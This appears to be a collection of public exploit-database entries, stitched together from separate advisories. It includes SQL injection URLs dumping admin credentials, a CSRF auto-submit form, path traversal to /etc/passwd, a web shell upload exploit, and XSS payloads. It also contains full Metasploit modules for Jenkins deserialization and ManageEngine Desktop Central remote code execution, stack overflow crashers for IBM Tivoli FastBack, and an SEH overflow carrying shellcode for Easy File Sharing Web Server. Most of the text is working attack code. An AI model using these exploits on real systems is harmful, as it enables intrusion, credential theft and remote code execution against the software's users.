<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://www.example.com/DSM/loader.php?load=account settings">
<input type="hidden" name="AccessCode" value="123456" />
<input type="hidden" name="ConfirmAccessCode" value="123456" />
<input type="hidden" name="Email" value="email@hotmail.com" />
<input type="hidden" name="MM_update" value="form2" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/DSM/loader.php?load=data export
send&tableid=3" class="button white">Export Accounts</a></label>
</html>
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff
http://www.example.com/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff
http://www.example.com/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff
================================================================================
Tequila File Hosting Arbitrary File Download
================================================================================
# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312
# Date: 16/12/2015
# Author: Ashiyane Digital Security Team
# Version: 1.5
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/tequila-disclose.txt
================================================================================
# Description:
Tequila is a solid, safe, fast, simple and intuitive script which
allows companies or individuals to upload, manage and share their
files online. It is studied in every feature and was produced with
attention to every detail.
# PoC :
# Download Config
http://localhost/tequila/download.php?download.php?filename=files/../include/php/constants.php&name=file.php
# Download passwd
http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd
# (PHP Exploit):
<?php
// page : download.php
echo "Tequila File Hosting Arbitrary File Download Exploiter\n";
echo "Discoverd By Ehsan Hosseini\n\n\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,
"http://SERVER/download.php?filename=files/../include/php/constants.php&name=file.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
# Vulnerabile code:
<?php
//This script forces the download of the file
//Retrieving the file name from the querystring
//and the stepping stone path to the download folder
$fn = (isset($_GET['filename']) ? $_GET['filename'] : false);
$file = $fn;
$sn = (isset($_GET['name']) ? $_GET['name'] : false);
$secure_name = $sn;
if (strpos($file, "files/") !== false) {
$checkdownload = "true";
} else {
$checkdownload = "false";
}
//I verify that the file exists
if($checkdownload == "true"){
if (!file_exists($file)) {
//If there is mold an error
echo "The file does not exist!";
} else {
//If the file exists ...
//Imposed on the header of the page to force the download of the file
header("Cache-Control: public");
header("Content-Description: File Transfer");
header('Content-Type: application/zip');
header("Content-Disposition: attachment; filename= " . $secure_name);
header("Content-Transfer-Encoding: binary");
header('Connection: Keep-Alive');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
//I read the contents of the file
readfile($file);
exit;
}
}
?>
#######################################################################
================================================================================
Tequila File Hosting Unrestricted File Upload
================================================================================
# PoC :
First register in the site===>
http://localhost/tequila/register.php
Next using this exploit :
<?php
// page : upload.php
$postData = array('folder' => '/username', 'file' => '@shell.php');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
or
curl -i -F folder='/ehsann' -F file=@ehsan.png
http://localhost/tequila/upload.php
Sheller uploaded.
Path of shell : http://localhost/tequila/files/username/shell.php
#######################################################################
================================================================================
Tequila File Hosting Coss Site Scripting
================================================================================
# PoC :
http://localhost/files.php?folder="><script>alert('Ehsan')</script>
http://easyhost.me/file.php?file="><script>alert('Ehsan')</script>
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
the Jenkins master, which allows remote arbitrary code execution. Authentication is not
required to exploit this vulnerability.
},
'Author' =>
[
'Christopher Frohoff', # Vulnerability discovery
'Steve Breen', # Public Exploit
'Dev Mohanty', # Metasploit module
'Louis Sato', # Metasploit
'William Vu', # Metasploit
'juan vazquez', # Metasploit
'Wei Chen' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-8103'],
['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Jenkins 1.637', {} ]
],
'DisclosureDate' => 'Nov 18 2015',
'DefaultTarget' => 0))
register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
Opt::RPORT('8080')
], self.class)
end
def exploit
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
end
invoke_remote_method(set_payload)
invoke_remote_method(class_load_payload)
end
# This is from the HttpClient mixin. But since this module isn't actually exploiting
# HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &
# conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.
def target_uri
begin
# In case TARGETURI is empty, at least we default to '/'
u = datastore['TARGETURI']
u = "/" if u.nil? or u.empty?
URI(u)
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
raise Msf::OptionValidateError.new(['TARGETURI'])
end
end
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
new_str
end
def check
result = Exploit::CheckCode::Safe
begin
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
result
end
def vulnerable?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
unless res
fail_with(Failure::Unknown, 'The connection timed out.')
end
http_headers = res.headers
unless http_headers['X-Jenkins-CLI-Port']
vprint_error('The server does not have the CLI port that is needed for exploitation.')
return false
end
if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637
@jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
return true
end
false
end
# Connects to the server, creates a request, sends the request,
# reads the response
#
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
#
def send_request_cgi(opts={}, timeout = 20)
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
actual_timeout = datastore['HttpClientTimeout']
else
actual_timeout = opts[:timeout] || timeout
end
begin
c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
c.connect
r = c.request_cgi(opts)
c.send_recv(r, actual_timeout)
rescue ::Errno::EPIPE, ::Timeout::Error
nil
end
end
def invoke_remote_method(serialized_java_stream)
begin
socket = connect(true, {'RPORT' => @jenkins_cli_port})
print_status 'Sending headers...'
socket.put(read_bin_file('serialized_jenkins_header'))
vprint_status(socket.recv(1024))
vprint_status(socket.recv(1024))
encoded_payload0 = read_bin_file('serialized_payload_header')
encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
encoded_payload2 = read_bin_file('serialized_payload_footer')
encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
print_status "Sending payload length: #{encoded_payload.length}"
socket.put(encoded_payload)
ensure
disconnect(socket)
end
end
def print_status(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
#
# Serialized stream generated with:
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
#
def set_payload
stream = Rex::Java::Serialization::Model::Stream.new
handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
decoded = stream.decode(handle)
handle.close
inject_payload_into_stream(decoded).encode
end
#
# Serialized stream generated with:
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
#
def class_load_payload
stream = Rex::Java::Serialization::Model::Stream.new
handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
decoded = stream.decode(handle)
handle.close
inject_class_loader_into_stream(decoded).encode
end
def inject_class_loader_into_stream(decoded)
file_name_utf8 = get_array_chain(decoded)
.values[2]
.class_data[0]
.values[1]
.values[0]
.values[0]
.class_data[3]
file_name_utf8.contents = get_random_file_name
file_name_utf8.length = file_name_utf8.contents.length
class_name_utf8 = get_array_chain(decoded)
.values[4]
.class_data[0]
.values[0]
class_name_utf8.contents = 'metasploit.Payload'
class_name_utf8.length = class_name_utf8.contents.length
decoded
end
def get_random_file_name
@random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
end
def inject_payload_into_stream(decoded)
byte_array = get_array_chain(decoded)
.values[2]
.class_data
.last
byte_array.values = payload.encoded.bytes
file_name_utf8 = decoded.references[44].class_data[0]
rnd_fname = get_random_file_name
register_file_for_cleanup(rnd_fname)
file_name_utf8.contents = rnd_fname
file_name_utf8.length = file_name_utf8.contents.length
decoded
end
def get_array_chain(decoded)
object = decoded.contents[0]
lazy_map = object.class_data[1].class_data[0]
chained_transformer = lazy_map.class_data[0]
chained_transformer.class_data[0]
end
def read_bin_file(bin_file_path)
data = ''
File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
data = f.read
end
data
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When
uploading a 7z file, the FileUploadServlet class does not check the user-controlled
ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to
inject a null bye at the end of the value to create a malicious file with an arbitrary
file type, and then place it under a directory that allows server-side scripts to run,
which results in remote code execution under the context of SYSTEM.
Please note that by default, some ManageEngine Desktop Central versions run on port 8020,
but older ones run on port 8040. Also, using this exploit will leave debugging information
produced by FileUploadServlet in file rdslog0.txt.
This exploit was successfully tested on version 9, build 90109 and build 91084.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249' ],
[ 'CVE', '2015-8249']
],
'Platform' => 'win',
'Targets' =>
[
[ 'ManageEngine Desktop Central 9 on Windows', {} ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false,
'DisclosureDate' => "Dec 14 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']),
Opt::RPORT(8020)
], self.class)
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|try {\n|
jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
jspraw << %Q|} catch (IOException ioe) { }\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def get_jsp_stager
exe = generate_payload_exe(code: payload.encoded)
jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp"
# pwd: C:\ManageEngine\DesktopCentral_Server\bin
# targeted location: C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}")
{
jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname),
jsp_name: jsp_fname
}
end
def get_build_number(res)
inputs = res.get_hidden_inputs
# The buildNum input is in the first form
inputs.first['buildNum']
end
def get_html_title(res)
html = res.body
n = ::Nokogiri::HTML(html)
n.at_xpath('//title').text
end
def check
uri = normalize_uri(target_uri.path, '/configurations.do')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
unless res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
build_number = get_build_number(res)
vprint_status("Found build number: #{build_number}")
html_title = get_html_title(res)
vprint_status("Found title: #{html_title}")
if build_number <= '91084'
return Exploit::CheckCode::Appears
elsif /ManageEngine Desktop Central/ === html_title
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def upload_jsp(stager_info)
# connectionId is part of the 7z filename
# computerName is part of the 7z filename (but will be used due to the null byte injection)
# customerId is used as a directory name
#
# The intended upload path is:
# C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\server-data\[customerId]\rds\scr-rec\null-computerName-connectionId.7z
# But this will upload to:
# C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
uri = normalize_uri(target_uri.path, 'fileupload')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => 'application/octet-stream',
'encode_params' => false,
'data' => stager_info[:jsp_payload],
'vars_get' => {
'connectionId' => "#{Rex::Text.rand_text_alpha(1)}/../../../../../jspf/#{stager_info[:jsp_name]}%00",
'resourceId' => Rex::Text.rand_text_alpha(1),
'action' => 'rds_file_upload',
'computerName' => Rex::Text.rand_text_alpha(rand(10)+5),
'customerId' => Rex::Text.rand_text_numeric(rand(10)+5)
}
})
if res.nil?
fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}")
elsif res && res.code != 200
fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.")
end
end
def exec_jsp(stager_info)
uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res.nil?
fail_with(Failure::Unknown, "Connection timed out while executing #{uri}")
elsif res && res.code != 200
fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}")
end
end
def exploit
print_status("Creating JSP stager")
stager_info = get_jsp_stager
print_status("Uploading JSP stager #{stager_info[:jsp_name]}...")
upload_jsp(stager_info)
print_status("Executing stager...")
exec_jsp(stager_info)
end
end
# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880
Proof-of-Concept:
/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
---------------------------------------------------------------
[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?
Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
So an attacker can use this to execute some php-shellcode for example.
### The 27 years old, german hacker bd0rk ###
#!/usr/bin/python
#
################################################################################
#
# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
# _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability
# Date: 14 December 2015
# Author: Gianni Gnesa (gnix)
#
# Vendor Homepage: http://www.ibm.com/
# Software Name: IBM Tivoli Storage Manager FastBack
# Software Version: 5.5.4.2 (x86)
# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
# (Version 5.5.4.2, Size: 120.7 MB)
#
# Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Vulnerability:
# ==============
#
# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk
# function caused by the insecure usage of _sscanf while parsing user-controlled
# input.
#
# .text:0057898E lea eax, [ebp+var_210]
# .text:00578994 push eax
# .text:00578995 lea ecx, [ebp+var_108]
# .text:0057899B push ecx
# .text:0057899C lea edx, [ebp+var_20C]
# .text:005789A2 push edx
# .text:005789A3 lea eax, [ebp+var_4]
# .text:005789A6 push eax
# .text:005789A7 lea ecx, [ebp+var_104] <=== Buffer that will be overwritten
# .text:005789AD push ecx
# .text:005789AE push offset $SG128635 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
# .text:005789B3 mov edx, [ebp+Src]
# .text:005789B6 push edx ; Src <=== Buffer under our control
# .text:005789B7 call _sscanf <=== Stack Buffer Overflow!!!
#
################################################################################
#
# Crash:
# ======
#
# (b44.9dc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=01cd4fb8 ecx=01dacf8c edx=776870b4 esi=01cd4fb8 edi=00000000
# eip=41414141 esp=01dae328 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 41414141 ?? ???
#
################################################################################
import sys
import time
import socket
from struct import pack
def create_pkt(opcode, p1="", p2="", p3=""):
# psAgentCommand (0x30 bytes)
buf = "\x44" * 0xC
buf+= pack("<L", opcode) # opcode
buf+= pack("<i", 0x0) # 1st memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p1)) # 1st memcpy: size field
buf+= pack("<i", len(p1)) # 2nd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p2)) # 2nd memcpy: size field
buf+= pack("<i", len(p1) + len(p2)) # 3rd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p3)) # 3rd memcpy: size field
buf+= "\x44\x44\x44\x44"
buf+= "\x44\x44\x44\x44"
# psCommandBuffer
buf+= p1
buf+= p2
buf+= p3
# buf len - 4 because the packet length is not included
buf = pack(">i", len(buf)-4) + buf
return buf
def main():
if len(sys.argv) != 2:
print "Usage: %s <ip_address>\n" % sys.argv[0]
sys.exit(1)
server = sys.argv[1]
port = 11460
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
pkt = create_pkt( opcode=0x531,
p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
p2 = "B" * 24000,
p3 = "C" * 24000 )
s.send(pkt)
s.close()
print "[+] Packet sent."
sys.exit(0)
if __name__ == "__main__":
main()
#!/usr/bin/python
#
################################################################################
#
# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
# _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability
# Date: 14 December 2015
# Author: Gianni Gnesa (gnix)
#
# Vendor Homepage: http://www.ibm.com/
# Software Name: IBM Tivoli Storage Manager FastBack
# Software Version: 5.5.4.2 (x86)
# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
# (Version 5.5.4.2, Size: 120.7 MB)
#
# Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Vulnerability:
# ==============
#
# The vulnerability is a stack buffer overflow in the _FXCLI_SetConfFileChunk
# function caused by the insecure usage of _sscanf while parsing user-controlled
# input.
#
# .text:00578D28 lea eax, [ebp+var_8]
# .text:00578D2B push eax
# .text:00578D2C lea ecx, [ebp+var_C]
# .text:00578D2F push ecx
# .text:00578D30 lea edx, [ebp+var_318]
# .text:00578D36 push edx
# .text:00578D37 lea eax, [ebp+var_4]
# .text:00578D3A push eax
# .text:00578D3B lea ecx, [ebp+Str1] <=== Buffer that will be overwritten
# .text:00578D41 push ecx
# .text:00578D42 push offset $SG128695 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
# .text:00578D47 mov edx, [ebp+Src]
# .text:00578D4A push edx ; Src <=== Buffer under our control
# .text:00578D4B call _sscanf <=== Stack Buffer Overflow!!!
#
################################################################################
#
# Crash:
# ======
#
# (a20.ee8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=01cd4fb8 ecx=01eaca78 edx=776870b4 esi=01cd4fb8 edi=00000000
# eip=41414141 esp=01eae324 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 41414141 ?? ???
#
################################################################################
import sys
import time
import socket
from struct import pack
def create_pkt(opcode, p1="", p2="", p3=""):
# psAgentCommand (0x30 bytes)
buf = "\x44" * 0xC
buf+= pack("<L", opcode) # opcode
buf+= pack("<i", 0x0) # 1st memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p1)) # 1st memcpy: size field
buf+= pack("<i", len(p1)) # 2nd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p2)) # 2nd memcpy: size field
buf+= pack("<i", len(p1) + len(p2)) # 3rd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p3)) # 3rd memcpy: size field
buf+= "\x44\x44\x44\x44"
buf+= "\x44\x44\x44\x44"
# psCommandBuffer
buf+= p1
buf+= p2
buf+= p3
# buf len - 4 because the packet length is not included
buf = pack(">i", len(buf)-4) + buf
return buf
def main():
if len(sys.argv) != 2:
print "Usage: %s <ip_address>\n" % sys.argv[0]
sys.exit(1)
server = sys.argv[1]
port = 11460
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
pkt = create_pkt( opcode=0x534,
p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
p2 = "B" * 24000,
p3 = "C" * 24000 )
s.send(pkt)
s.close()
print "[+] Packet sent."
sys.exit(0)
if __name__ == "__main__":
main()
# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port
import socket
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
a = socket.socket()
print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))
entire=4500
# Junk
buff = "A"*4061
# Next SEH
buff+= "\xeb\x0A\x90\x90"
# pop pop ret
buff+= "\x98\x97\x01\x10"
buff+= "\x90"*19
# calc.exe
# Bad Characters: \x20 \x2f \x5c
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)
buff+= shellcode
buff+= "\x90"*7
buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)
# GET
a.send("GET " + buff + " HTTP/1.0\r\n\r\n")
a.close()
print "Done..."
#Exploit Title : ECommerceMajor SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 13/Dec/2015
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
1. Description
"prodid" field in productdtl.php is not properly sanitized, that leads to
SQL Injection Vulnerability.
2. Vulnerable Code:
line 14 to 28
<?php
$getallproduct="select * from purchase where id=$_GET[prodid] order by id
desc";
$getallproductresult=mysql_query($getallproduct);
$getallproducttotal=mysql_num_rows($getallproductresult);
3. POC
http://127.0.0.1/ecommercemajor/productdtl.php?prodid=SQLI